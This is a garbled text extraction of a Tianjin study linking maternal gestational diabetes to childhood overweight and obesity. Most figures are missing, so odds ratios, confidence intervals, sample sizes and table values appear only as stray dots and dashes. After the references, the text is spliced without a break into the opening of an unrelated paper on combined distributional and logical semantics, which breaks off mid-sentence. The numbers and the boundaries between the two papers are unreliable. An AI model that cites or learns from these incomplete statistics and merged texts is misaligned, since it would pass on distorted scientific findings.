and obesity with multivariate-adjusted odds ratios of . ( % confidence interval (ci): . – . ) and . ( % ci: . – . ), respectively, compared with the children of mothers without gdm during pregnancy. this study demonstrates that maternal gdm is an independent risk factor of childhood overweight and obesity and is associated with higher bmi in the offspring. introduction the worldwide rise in over-nutrition, sedentary life and obesity has resulted in a steep increase in the number of women who develop gestational diabetes mellitus (gdm) during pregnancy ( ). nearly % of pregnancies in the united states were affected by gdm, which is defined as any degree of glucose intolerance with onset or first recognition during pregnancy ( ). the global prevalence of gdm ranged from . to . % ( ). women with prior gdm are known to increase the risk of hypertensive disorders of pregnancy, the need for cesarean delivery, the possibility of fetal macrosomia ( ) and the long-term risk of developing type diabetes in later life, compared with non-gdm women ( ). with respect to the long-term effects on the growth and development of children with gdm mothers, there are conflicting findings in previous studies. in the - - key words f gestational diabetes mellitus f childhood obesity f maternal glucose levels f childhood growth f early childhood risk factors endocrine connections ( ) , – id: - this work is licensed under a creative commons attribution-noncommercial . international license. https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd mailto:gang.hu@pbrc.edu https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com j wang et al. gdm and offspring’s obesity : northwestern diabetes in pregnancy study in chicago, diabetes during pregnancy (gdm and preexistent diabetes) was positively associated with the offspring’s bmi at birth and after  years old ( , ). the offspring of pima indian women with preexistent diabetes and gdm had much higher rates of obesity at age –   years, compared with their counterparts born to prediabetic and nondiabetic women ( , ). however, these differences may be due to the high type diabetes (t d) risk in the specialized population from the pima indians and a specialized pregnancy clinical population in chicago ( ). regarding to the general population, two recent studies from the hyperglycemia and adverse pregnancy outcome study (hapo) ( ) and kaiser permanente northwest and hawaii ( ) presented that maternal hyperglycemia during pregnancy increased the offspring’s risk of overweight and obesity among -year-old girls and during the first decade among normal birth weight infants, respectively. however, other studies did not find a clear association between maternal gdm and obesity in offspring of more than  years old ( , , ). thus, more studies are expected to provide evidence and illustrate the impact of gdm on children’s growth and development. the present study aims to compare different indicators of childhood obesity between offspring exposed to maternal gdm and those not exposed and assess the associations between maternal gdm and their offspring’s overweight and obesity risk. methods gdm screening process we used a two-step approach in the gdm diagnosis in tianjin, china. we first invited all pregnant women (at their – gestational weeks) to participate in a -h oral glucose tolerance test (ogtt) with g glucose load in their community health centers. then, those whose glucose reading ≥ . mmol/l were referred to the tianjin women’s and children’s health center to undergo a -h ogtt with g glucose load. if the pregnant women met the world health organization (who)’s criteria of diabetes (fasting glucose ≥ mmol/l or -h glucose ≥ . mmol/l) or impaired glucose tolerance (igt) ( -h glucose ≥ . mmol/l and < . mmol/l), they would be diagnosed as gdm ( ). from , all pregnant women living in the six urban districts of tianjin have been screened for gdm ( ). study population we conducted a large study in gdm mother–child pairs and their counterparts with non-gdm mothers, matched by children’s genders and ages. the gdm mothers came from the tianjin gestational diabetes mellitus prevention program ( ), a randomized controlled trial conducted among gdm women living in the six urban districts in tianjin. a total of eligible women, who were diagnosed with gdm between and , were invited to join the program by mailing. during august to july , a total of gdm women at their postpartum –   years finished the baseline survey. of them, were diagnosed as having type diabetes, and the rest gdm women then attended the tianjin gestational diabetes mellitus prevention program. the recruitment, inclusion and exclusion criteria have been described in detail elsewhere ( ). we randomly chose gdm mother–child pairs who finished the year or follow-up survey and also stored blood samples. simultaneously, we also enrolled non-gdm mother–child pairs, with age and sex frequency matched to the children of gdm mothers (fig.  ). we collected written informed consents from all tianjin gdm screening , pregnant women ( - wk) in tianjin, china ( to ) , women with gdm , women without gdm , gdm women were willing to make an appointment , were excluded , ( . %) eligible finished baseline survey were excluded were excluded , ( . %) eligible finished baseline survey (completed a self-reported questionnaire and underwent a physical examination.) follow-up surveys case group gdm mother-child pairs were randomly chosen from participants who finished the year or follow-up visit and also stored blood samples control group non-gdm mother-child pairs were enrolled, matched by children’s gender and age figure  flow chart. this work is licensed under a creative commons attribution-noncommercial . international license. https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com j wang et al. gdm and offspring’s obesity : participants, and this study was approved by the human subjects committee of tianjin women’s and children’s health center. mothers’ information was collected by a self- administered questionnaire, including socio-demographic characteristics, such as age, marital status, education (< , – , and ≥  years), family income (< , – and ≥ yuan/month), and occupation; pregnancy outcomes (prepregnancy weight, weight gain during pregnancy, gestational age and the number of births in the index pregnancy) and lifestyle in the past year, such as smoking status (non-smokers, former smokers and current smokers), passive smoking, drinking status, sitting time and leisure-time physical activity ( , – , and ≥ min/ day). children’s information was collected by another questionnaire completed by their mothers, including children’s general information, such as gender, birth date, age, birth weight, birth length, the mode of infant feeding within the first  months (exclusive formula, mixed breast and formula or exclusive breast) and lactation duration; history of diseases and medication; dietary habits (using a validated food frequency questionnaire (ffq) ( )) and routine activities (indoor and outdoor activities, screening watching time and sleep duration). all mother–child pairs underwent a physical examination. using the standardized protocol, all participants’ height and weight were measured in light indoor clothing and without shoes by trained research doctors. moreover, the children’s physical examination also included the measurement of body fat, waist circumference, triceps skinfold, subscapular skinfold and suprailiac skinfold. body weight was measured with a beam balance scale to the nearest . kg; height was measured by a stadiometer to the nearest . cm. waist circumference was measured midway between the th rib and the top of the iliac crest to the nearest . cm. body fat was measured by a body composition analyzer (inbody j ) to the nearest . %. triceps skinfold, subscapular skinfold and suprailiac skinfold were measured by skinfold caliper to the nearest . cm. calculation of bmi bmi was obtained by dividing weight in kilograms by the square of height in meters. all mothers’ prepregnancy bmi calculation used their self-reported prepregnancy weight and their height. according to the chinese bmi cut-offs ( ), prepregnancy bmi was categorized as < , – . and ≥ kg/m . children’s bmi calculation used their body weight and height examined in the study visit. children’s z scores and overweight/obesity children’s z scores (including z scores for height-for- age (z-height), z scores for weight-for-age (z-weight), z scores for bmi-for-age (z-bmi)), calculated based on the protocol from the who, are gender-independent classification systems, representing equivalent height/ weight/bmi-for-age percentile based on the who growth reference ( ). children’s overweight and obesity was defined by children’s z-bmi: we defined normal weight as a bmi less than the th percentiles for age and gender based on the who growth reference (z-score < . ), overweight as a bmi above the th percentiles (z-score ≥ . ), and obesity as a bmi above the th percentiles (z-score ≥ . ) ( ). central obesity was defined as waist circumference ≥the th percentiles for age- and gender- specific distribution, according to the national health and nutrition examination survey (nhanes) iii ( ). high body fat was defined as body fat ≥the th percentiles of the nhanes iv ( ) (since the references were available from   years old, we defined high body fat only among the children over  years old). statistical analyses we used t-test and chi-square test to compare the general characteristics (continuous and categorical variables) of both mothers and children according to maternal gdm status. general linear models were applied to assess the differences in children’s z-bmi, z-weight, z-height, body fat, waist circumference, triceps skinfold, subscapular skinfold and suprailiac skinfold according to maternal gdm status. cox proportional hazards models were used to estimate hazards ratios for children’s overweight, obesity, central obesity and high body fat according to maternal gdm status. the analyses included three multivariable adjusted models: model adjusted for maternal age, gestational age and education; model adjusted for the variables in model and also for maternal smoking status, passive smoking status, alcohol drinking status, as well as children’s feeding method during the first   months after birth, children’s vegetables and fruits intake frequency, outdoor time, screen watching time and sleeping duration; model adjusted for the variables in model and also for maternal prepregnancy bmi and maternal gestational weight gain. all analyses were performed using ibm spss statistics . (ibm spss) with a statistical significance at . . this work is licensed under a creative commons attribution-noncommercial . international license. https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com j wang et al. gdm and offspring’s obesity : table maternal and children’s characteristics according to maternal gestational diabetes status. maternal and children’s characteristics non-gdm gdm p value number of subjects maternal characteristics age at delivery, years . ± . . ± . < . gestational age at delivery, weeks . ± . . ± . . prepregnancy bmi, kg/m . ± . . ± . < . prepregnancy bmi categories, % < . < . . . . – . . . ≥ . . gestational weight gain, kg . ± . . ± . < . education, % < . ≤  years . . –  years . . ≥  years . . current smokers, % . . . passive smokers, % . . . alcohol drinkers, % . . < . child characteristics boy, % . . . age, months . ± . . ± . . mode of infant feeding, % . exclusive breastfeeding . . mixed breast and formula . . exclusive formula feeding . . vegetables intake frequency, % < . ≤ time/day . . times/day . . ≥ times/day . . fruits intake frequency, % . < time/day . . time/day . . > time/day . . outdoor activity, h/day . ± . . ± . . screen watching time, h/day . ± . . ± . < . sleeping duration, % . ≤ h/day . . – h/day . . ≥ h/day . . birth bmi, kg/m . . < . height, cm ± . ± . . z-score for height-for-age . ± . . ± . . weight, kg . ± . . ± . . z-score for weight-for-age . ± . . ± . . body mass index, kg/m . ± . . ± . < . z-score for body mass index-for-age . ± . . ± . < . waist circumference, cm . ± . . ± . < . body fat, % . ± . . ± . < . triceps skinfold, mm . ± . . ± . . subscapular skinfold, mm . ± . . ± . < . suprailiac skinfold, mm . ± . . ± . < . overweight (z-bmi ≥ . ), % . . . obesity (z-bmi ≥ . ), % . . . central obesity, % . . . high body fat, % . . . values are means ± s.d. unless otherwise specified. gdm, gestational diabetes mellitus. this work is licensed under a creative commons attribution-noncommercial . international license. https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com j wang et al. gdm and offspring’s obesity : results table  presents maternal and children’s characteristics according to maternal gdm status. compared with non- gdm mothers, gdm mothers were older at delivery, more overweight and obese before pregnancy, less current smokers and less alcohol drinkers and had less gestational weight gain and less education level. compared with children born to non-gdm mothers, children born to gdm mothers had higher birth bmi, longer screen watching time but shorter sleeping duration. after adjustment for maternal age, gestational age, education, current smoking status, passive smoking status, alcohol drinking status and children’s feeding method, children’s vegetables and fruits intake frequency, outdoor time, screen watching time and sleeping duration (multivariable-adjusted model ), children born to gdm mothers had higher mean values of z-bmi ( . vs . ), z-weight ( . vs . ), body fat ( . vs . %), waist circumference ( . vs . cm), subscapular skinfold ( . vs . mm) and suprailiac skinfold ( . vs . mm) than children born to non-gdm mothers (table  ). after additional adjustment for maternal prepregnancy bmi and gestational weight gain (multivariable-adjusted model ), these differences still remained significant. the multivariable-adjusted (model ) odds ratios among children of gdm mothers compared with children of non-gdm mothers were . ( % confidence interval (ci) . – . ) for overweight, . ( % ci . – . ) for obesity and . ( % . – . ) for high body fat, respectively (table  ). when further adjusting for maternal prepregnancy bmi and gestational weight gain, these associations were somewhat attenuated but remained significant. there was no significant association between gdm status and children’s central obesity. discussion in this large study, we found that children born to gdm mothers had higher z-weight, z-bmi, waist circumference, body fat, subscapular skinfold and suprailiac skinfold and were associated with increased risks of overweight, obesity and high body fat compared with children born to table comparison of children’s measurements according to maternal gestational diabetes status. children’s measurements multivariable-adjusted models non-gdm (n = ) gdm (n = ) p value z-score of bmi-for-age model . ( . ) . ( . ) < . model . ( . ) . ( . ) < . model . ( . ) . ( . ) . z-score of weight-for-age model . ( . ) . ( . ) . model . ( . ) . ( . ) . model . ( . ) . ( . ) . z-score of height-for-age model . ( . ) . ( . ) . model . ( . ) . ( . ) . model . ( . ) . ( . ) . body fat, % model . ( . ) . ( . ) . model . ( . ) . ( . ) < . model . ( . ) . ( . ) . waist circumference, cm model . ( . ) . ( . ) < . model . ( . ) . ( . ) < . model . ( . ) . ( . ) < . triceps skinfold, mm model . ( . ) . ( . ) . model . ( . ) . ( . ) . model . ( . ) . ( . ) . subscapular skinfold, mm model . ( . ) . ( . ) . model . ( . ) . ( . ) . model . ( . ) . ( . ) . suprailiac skinfold, mm model . ( . ) . ( . ) < . model . ( . ) . ( . ) < . model . ( . ) . ( . ) < . data are means (s.e.). model adjusted for maternal age, gestational age, education, and children’s age; for z-score of bmi-for-age, z-score of weight- for-age and z-score of height-for-age, adjusted for maternal age, gestational age and education only. model adjusted for covariates in model and also for maternal smoking status, passive smoking status, alcohol drinking status, as well as children’s feeding status, vegetables and fruits intake frequency, outdoor time, screening watching time and sleeping duration. model adjusted for in model and also for maternal prepregnancy bmi and weight gain during pregnancy. bmi, body mass index; gdm, gestational diabetes mellitus. this work is licensed under a creative commons attribution-noncommercial . international license. https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com j wang et al. gdm and offspring’s obesity : non-gdm mothers. these associations were independent of maternal prepregnancy bmi, gestational weight gain and other related maternal and infant factors. as known in the previous studies, in utero exposure to gdm is a risk factor of macrosomia and large for gestational age at birth and developing obesity and type diabetes during adolescence or young adulthood in the offspring ( ). however, debates on the associations between maternal gdm status and childhood overweight and obesity risks have never stopped. studies of northwestern diabetes in pregnancy study in chicago ( , ), pima indian ( ), hapo in hongkong ( ) and kaiser permanente centers ( ) claimed to find a positive association between maternal gdm and childhood obesity, while other studies including one hapo study in uk argued that little association existed ( , , , , ). discrepancies in these findings may be due to small sample sizes of gdm-exposed children or research conducted among high type diabetes (t d) risk populations (pima indians and chicago study ( )). the present study included a large sample size of gdm and non-gdm mother–child pairs and had enough power to compare the differences of offspring’s growth between gdm and non-gdm exposure. also, we controlled various covariates in the multivariable-adjusted analysis, such as maternal social-economic characteristics, lifestyle factors, infant feeding status, children’s diet and lifestyle, maternal weight gain during pregnancy and prepregnancy bmi, which were identified as important confounders of this association ( ). evidence from human and animal research indicates that the environment in utero plays an important role on the growth of infants. the possible explanation underlying the findings could be ‘metabolic imprinting’, which is known as ‘the process by which a stimulus or insult occurring during a critical period of development has a long-term effect on the physiologic and metabolic responses of the offspring’ ( ). it represented a determinant of an over-nutritional status of fetus and further leading to offspring’s diseases later in life ( ). one of the underlying mechanisms may be the delivery of excessive nutrients from mothers to the fetus; maternal glucose but not insulin can cross the placenta which in turn influences the development of the fetus in utero and even long-term health ( ). previous animal models provided strong evidence that maternal diabetes increased the risks of offspring’s obesity and diabetes: gdm affected offspring’s obesity and insulin resistance in the livers, and further was associated with susceptibility to type diabetes mellitus ( , ). increasing obesity among children was also associated with lifestyle changes, such as over-nutrition and more sedentary time. in this study, we also found that children born to gdm mothers had longer screen watching time but shorter sleeping duration than their counterparts. in the analysis, we controlled these diet and lifestyle variables, but they may affect children’s overweight and obesity in the real world. we tried to assess children’s obesity in a more detailed way than previous studies, so we included not only bmi, weight, height, overweight and obesity, but also body fat, waist circumference, triceps skinfold, subscapular skinfold and suprailiac skinfold as evaluating indicator of obesity. moreover, the data were based on the asian population, who are of increasing burden of childhood obesity and diabetes; as such identification and understanding of early life risk factors are particularly relevant. finally, maternal gdm was diagnosed based on the who criteria. there were several limitations in our study. one limitation of the study was that it was a cross-sectional study. thus, we could not make cause-and-effect inferences. second, maternal table odds ratios for childhood overweight, obesity, central obesity and high body fat by maternal gdm status. outcomes no. of cases/participants odds ratios ( % cis) model model model overweight non-gdm / . . . gdm / . ( . – . ) . ( . – . ) . ( . – . ) obesity non-gdm / . . . gdm / . ( . – . ) . ( . – . ) . ( . – . ) central obesity non-gdm / . . . gdm / . ( . – . ) . ( . – . ) . ( . – . ) high body fat non-gdm / . . . gdm / . ( . – . ) . ( . – . ) . ( . – . ) model adjusted for maternal age, gestational age, and education. model adjusted for covariates in model and also for maternal smoking status, passive smoking status, alcohol drinking status, as well as children’s feeding method, vegetables and fruits intake frequency, outdoor time, screening watching time and sleeping duration. model adjusted for in model and also for maternal prepregnancy bmi and weight gain during pregnancy. ci, confidence intervals; gdm, gestational diabetes mellitus. this work is licensed under a creative commons attribution-noncommercial . international license. https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com j wang et al. gdm and offspring’s obesity : prepregnancy weight and gestational weight gain were based on self-reported data, which may introduce recall bias. nevertheless, validation studies in the united states and england have found good concordance between self-reported information during pregnancy and clinical records ( ). moreover, the children’s body measurements taken at different ages may conceal at what age this association between gdm and childhood overweight/ obesity becomes apparent. in conclusion, maternal gdm is an independent risk factor of childhood overweight and obesity, and it is associated with children’s faster growth of bmi. children who are exposed to hyperglycemia in utero have higher risks of becoming overweight and obese. therefore, for this high-risk population, appropriate intervention strategies are needed. declaration of interest the authors declare that there is no conflict of interest that could be perceived as prejudicing the impartiality of the research reported. funding this study was supported by the tianjin women’s and children’s health center, tianjin public health bureau, european foundation for the study of diabetes (efsd)/chinese diabetes society (cds)/lilly programme for collaborative research between china and europe. dr hu was partly supported by the grant from the national institute of diabetes and digestive and kidney diseases (r dk ) and the national institute of general medical sciences (u gm ) of the national institutes of health. author contribution statement g h and j w designed this study. l w, h l, j l, s z and w l conducted the field research. j w, w l, t z and n l conducted data organization and analysis. j w drafted the manuscript. a a b, l h and g h critically reviewed and revised the manuscript. acknowledgements the authors would like to appreciate all the hard-working people from tianjin women’s and children’s health center dedicating to the tianjin gestational diabetes mellitus prevention program. references american diabetes association. gestational diabetes mellitus. diabetes care (supplement ) s –s . metzger be & coustan dr. summary and recommendations of the fourth international workshop-conference on gestational diabetes mellitus. the organizing committee. diabetes care (supplement ) b –b . zhu y & zhang c. prevalence of gestational diabetes and risk of progression to type diabetes: a global perspective. current diabetes reports . (https://doi.org/ . /s - - -x) bellamy l, casas jp, hingorani ad & williams d. type diabetes mellitus after gestational diabetes: a systematic review and meta-analysis. lancet – . (https://doi.org/ . / s - ( ) - ) silverman bl, rizzo t, green oc, cho nh, winter rj, ogata es, richards ge & metzger be. long-term prospective evaluation of offspring of diabetic mothers. diabetes (supplement ) – . (https://doi.org/ . /diab. . .s ) silverman bl, rizzo ta, cho nh & metzger be. long-term effects of the intrauterine environment. the northwestern university diabetes in pregnancy center. diabetes care (supplement ) b –b . pettitt dj, baird hr, aleck ka, bennett ph & knowler wc. excessive obesity in offspring of pima indian women with diabetes during pregnancy. new england journal of medicine – . (https://doi.org/ . /nejm ) pettitt dj, nelson rg, saad mf, bennett ph & knowler wc. diabetes and obesity in the offspring of pima indian women with diabetes during pregnancy. diabetes care – . (https://doi. org/ . /diacare. . . ) dabelea d. the predisposition to obesity and diabetes in offspring of diabetic mothers. diabetes care (supplement ) s –s . (https://doi.org/ . /dc -s ) tam wh, ma rcw, ozaki r, li am, chan mhm, yuen ly, lao tth, yang x, ho cs, tutino ge, et al. in utero exposure to maternal hyperglycemia increases childhood cardiometabolic risk in offspring. diabetes care – . (https://doi. org/ . /dc - ) hillier ta, pedula kl, vesco kk, oshiro ce & ogasawara kk. impact of maternal glucose and gestational weight gain on child obesity over the first decade of life in normal birth weight infants. maternal and child health journal – . (https://doi.org/ . / s - - - ) whitaker rc, pepe ms, seidel kd, wright ja & knopp rh. gestational diabetes and the risk of offspring obesity. pediatrics e . (https://doi.org/ . /peds. . .e ) gillman mw, rifas-shiman s, berkey cs, field ae & colditz ga. maternal gestational diabetes, birth weight, and adolescent obesity. pediatrics e –e . (https://doi.org/ . / peds. . .e ) tam wh, ma rc, yang x, ko gt, tong pc, cockram cs, sahota ds, rogers ms & chan jc. glucose intolerance and cardiometabolic risk in children exposed to maternal gestational diabetes mellitus in utero. pediatrics – . (https://doi.org/ . / peds. - ) who consultation. definition, diagnosis and classification of diabetes mellitus and its complications. part : diagnosis and classification of diabetes mellitus. geneva, switzerland: world health organization, . li w, liu h, qiao y, lv f, zhang s, wang l, leng j, qi l, tuomilehto j & hu g. metabolic syndrome of weight change from pre-pregnancy to – years post-partum among chinese women with prior gestational diabetes. diabetic medicine – . (https://doi.org/ . /dme. ) hu g, tian h, zhang f, liu h, zhang c, zhang s, wang l, liu g, yu z, yang x, et al. tianjin gestational diabetes mellitus prevention program: study design, methods, and -year interim report on the feasibility of lifestyle intervention program. diabetes research and clinical practice – . (https://doi.org/ . /j. diabres. . . ) li yp, he yn, zhai fy, yang xg, hu xq, zhao wh & ma gs. [comparison of assessment of food intakes by using dietary survey methods]. zhonghua yu fang yi xue za zhi – . zhou b. [predictive values of body mass index and waist circumference to risk factors of related diseases in chinese adult population]. zhonghua liu xing bing xue za zhi – . world health organization. the who child growth standards. geneva, switzerland: world health organization, . this work is licensed under a creative commons attribution-noncommercial . international license. https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd https://doi.org/ . /s - - -x https://doi.org/ . /s - ( ) - https://doi.org/ . /s - ( ) - https://doi.org/ . /diab. . .s https://doi.org/ . /nejm https://doi.org/ . /diacare. . . https://doi.org/ . /diacare. . . https://doi.org/ . /dc -s https://doi.org/ . /dc - https://doi.org/ . /dc - https://doi.org/ . /s - - - https://doi.org/ . /s - - - https://doi.org/ . /peds. . .e https://doi.org/ . /peds. . .e https://doi.org/ . /peds. . .e https://doi.org/ . /peds. - https://doi.org/ . /peds. - https://doi.org/ . /dme. https://doi.org/ . /j.diabres. . . https://doi.org/ . /j.diabres. . . https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com j wang et al. gdm and offspring’s obesity : ogden cl, carroll md, kit bk & flegal km. prevalence of obesity and trends in body mass index among us children and adolescents, – . jama – . (https://doi.org/ . / jama. . ) fernandez jr, redden dt, pietrobelli a & allison db. waist circumference percentiles in nationally representative samples of african-american, european-american, and mexican-american children and adolescents. journal of pediatrics – . (https://doi.org/ . /j.jpeds. . . ) laurson kr, eisenmann jc & welk gj. body fat percentile curves for u.s. children and adolescents. american journal of preventive medicine s –s . (https://doi.org/ . /j.amepre. . . ) reece ea. the fetal and maternal consequences of gestational diabetes mellitus. journal of maternal-fetal and neonatal medicine – . (https://doi.org/ . / ) thaware pk, mckenna s, patterson cc, hadden dr, pettitt dj & mccance dr. untreated mild hyperglycemia during pregnancy and anthropometric measures of obesity in offspring at age – years. diabetes care – . (https://doi.org/ . / dc - ) pettitt dj, mckenna s, mclaughlin c, patterson cc, hadden dr & mccance dr. maternal glucose at weeks of gestation is not associated with obesity in -year-old offspring: the belfast hyperglycemia and adverse pregnancy outcome (hapo) family study. diabetes care – . (https://doi.org/ . / dc - ) lawlor da. the society for social medicine john pemberton lecture . developmental overnutrition-an old hypothesis with new importance? international journal of epidemiology – . (https://doi.org/ . /ije/dys ) sullivan el & grove kl. metabolic imprinting in obesity. forum of nutrition – . waterland ra & garza c. potential mechanisms of metabolic imprinting that lead to chronic disease. american journal of clinical nutrition – . (https://doi.org/ . /ajcn/ . . ) fraser a & lawlor da. long-term health outcomes in offspring born to women with diabetes in pregnancy. current diabetes reports . (https://doi.org/ . /s - - -x) oh w, gelardi nl & cha cj. maternal hyperglycemia in pregnant rats: its effect on growth and carbohydrate metabolism in the offspring. metabolism – . (https://doi. org/ . / - ( ) - ) yamashita h, shao j, qiao l, pagliassotti m & friedman je. effect of spontaneous gestational diabetes on fetal and postnatal hepatic insulin resistance in lepr(db/+) mice. pediatric research – . (https://doi.org/ . / .pdr. . . d) dietz p, bombard j, mulready-ward c, gauthier j, sackoff j, brozicevic p, gambatese m, nyland-funke m, england l, harrison l, et al. validation of self-reported maternal and infant health indicators in the pregnancy risk assessment monitoring system. maternal and child health journal – . (https://doi. org/ . /s - - -y) received in final form november accepted november accepted preprint published online december this work is licensed under a creative commons attribution-noncommercial . international license. https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd https://doi.org/ . /jama. . https://doi.org/ . /jama. . https://doi.org/ . /j.jpeds. . . https://doi.org/ . /j.amepre. . . https://doi.org/ . / https://doi.org/ . /dc - https://doi.org/ . /dc - https://doi.org/ . /dc - https://doi.org/ . /dc - https://doi.org/ . /ije/dys https://doi.org/ . /ajcn/ . . https://doi.org/ . /s - - -x https://doi.org/ . / - ( ) - https://doi.org/ . / - ( ) - https://doi.org/ . / .pdr. . . d https://doi.org/ . /s - - -y https://doi.org/ . /s - - -y https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com abstract introduction methods gdm screening process study population calculation of bmi children’s z scores and overweight/obesity statistical analyses results discussion declaration of interest funding author contribution statement acknowledgements references edinburgh research explorer combined distributional and logical semantics citation for published version: lewis, m & steedman, m , 'combined distributional and logical semantics', transactions of the association for computational linguistics, vol. , pp. - . <http://aclweb.org/anthology//q/q /q - .pdf> link: link to publication record in edinburgh research explorer document version: peer reviewed version published in: transactions of the association for computational linguistics general rights copyright for the publications made accessible via the edinburgh research explorer is retained by the author(s) and / or other copyright owners and it is a condition of accessing these publications that users recognise and abide by the legal requirements associated with these rights. take down policy the university of edinburgh has made every reasonable effort to ensure that edinburgh research explorer content complies with uk legislation. if you believe that the public display of this file breaches copyright please contact openaccess@ed.ac.uk providing details, and we will remove access to the work immediately and investigate your claim. download date: . apr. http://aclweb.org/anthology//q/q /q - .pdf http://aclweb.org/anthology//q/q /q - .pdf https://www.research.ed.ac.uk/portal/en/publications/combined-distributional-and-logical-semantics( aae bb - ff- c-be d- b bbbc).html transactions of the association for computational linguistics, ( ) – . action editor: johan bos. submitted / ; revised / ; published / . c© association for computational linguistics. combined distributional and logical semantics mike lewis school of informatics university of edinburgh edinburgh, eh ab, uk mike.lewis@ed.ac.uk mark steedman school of informatics university of edinburgh edinburgh, eh ab, uk steedman@inf.ed.ac.uk abstract we introduce a new approach to semantics which combines the benefits of distributional and formal logical semantics. distributional models have been successful in modelling the meanings of content words, but logical se- mantics is necessary to adequately represent many function words. we follow formal se- mantics in mapping language to logical rep- resentations, but differ in that the relational constants used are induced by offline distri- butional clustering at the level of predicate- argument structure. our clustering algorithm is highly scalable, allowing us to run on cor- pora the size of gigaword. different senses of a word are disambiguated based on their in- duced types. we outperform a variety of ex- isting approaches on a wide-coverage question answering task, and demonstrate the ability to make complex multi-sentence inferences in- volving quantifiers on the fracas suite. introduction mapping natural language to meaning representa- tions is a central challenge of nlp. there has been much recent progress in unsupervised distributional semantics, in which the meaning of a word is in- duced based on its usage in large corpora. this ap- proach is useful for a range of key applications in- cluding question answering and relation extraction (lin and pantel, ; poon and domingos, ; yao et al., ). because such a semantics can be automically induced, it escapes the limitation of de- pending on relations from hand-built training data, knowledge bases or ontologies, which have proved of limited use in capturing the huge variety of mean- ings that can be expressed in language. however, distributional semantics has largely de- veloped in isolation from the formal semantics liter- ature. whilst distributional semantics has been ef- fective in modelling the meanings of content words such as nouns and verbs, it is less clear that it can be applied to the meanings of function words. semantic operators, such as determiners, negation, conjunc- tions, modals, tense, mood, aspect, and plurals are ubiquitous in natural language, and are crucial for high performance on many practical applications— but current distributional models struggle to capture even simple examples. conversely, computational models of formal semantics have shown low recall on practical applications, stemming from their re- liance on ontologies such as wordnet (miller, ) to model the meanings of content words (bobrow et al., ; bos and markert, ). for example, consider what is needed to answer a question like did google buy youtube? from the following sentences: . google purchased youtube . google’s acquisition of youtube . google acquired every company . youtube may be sold to google . google will buy youtube or microsoft . google didn’t takeover youtube all of these require knowledge of lexical seman- tics (e.g. that buy and purchase are synonyms), but some also need interpretation of quantifiers, nega- tives, modals and disjunction. it seems unlikely that distributional or formal approaches can accomplish the task alone. we propose a method for mapping natural lan- guage to first-order logic representations capable of capturing the meanings of function words such as every, not and or, but which also uses distributional statistics to model the meaning of content words. our approach differs from standard formal seman- tics in that the non-logical symbols used in the log- ical form are cluster identifiers. where standard se- mantic formalisms would map the verb write to a write’ symbol, we map it to a cluster identifier such as relation , which the noun author may also map to. this mapping is learnt by offline clustering. unlike previous distributional approaches, we perform clustering at the level of predicate-argument structure, rather than syntactic dependency struc- ture. this means that we abstract away from many syntactic differences that are not present in the se- mantics, such as conjunctions, passives, relative clauses, and long-range dependencies. this signifi- cantly reduces sparsity, so we have fewer predicates to cluster and more observations for each. of course, many practical inferences rely heavily on background knowledge about the world—such knowledge falls outside the scope of this work. background our approach is based on combinatory categorial grammar (ccg; steedman, ), a strongly lexi- calised theory of language in which lexical entries for words contain all language-specific information. the lexical entry for each word contains a syntactic category, which determines which other categories the word may combine with, and a semantic inter- pretation, which defines the compositional seman- tics. for example, the lexicon may contain the entry: write ` (s\np)/np : λ yλ x.write′(x,y) crucially, there is a transparent interface between the syntactic category and the semantics. for ex- ample the transitive verb entry above defines the verb syntactically as a function mapping two noun- phrases to a sentence, and semantically as a bi- nary relation between its two argument entities. this means that it is relatively straightforward to deterministically map parser output to a logical form, as in the boxer system (bos, ). this every dog barks np↑/n n s\np λ pλ q.∀x[p(x) =⇒ q(x)] λ x.dog′(x) λ x.bark′(x) > np↑ λ q.∀x[dog′(x) =⇒ q(x)] > s ∀x[dog′(x) =⇒ bark′(x)] figure : a standard logical form derivation using ccg. the np↑ notation means that the subject is type-raised, and taking the verb-phrase as an argument—so is an ab- breviation of s/(s\np). this is necessary in part to sup- port a correct semantics for quantifiers. input sentence shakespeare wrote macbeth ⇓ intial semantic analysis writearg ,arg (shakespeare, macbeth) ⇓ entity typing writearg :per,arg :book (shakespeare:per, macbeth:book) ⇓ distributional semantic analysis relation (shakespeare:per, macbeth:book) figure : layers used in our model. form of semantics captures the underlying predicate- argument structure, but fails to license many impor- tant inferences—as, for example, write and author do not map to the same predicate. in addition to the lexicon, there is a small set of binary combinators and unary rules, which have a syntactic and semantic interpretation. figure gives an example ccg derivation. overview of approach we attempt to learn a ccg lexicon which maps equivalent words onto the same logical form—for example learning entries such as: author ` 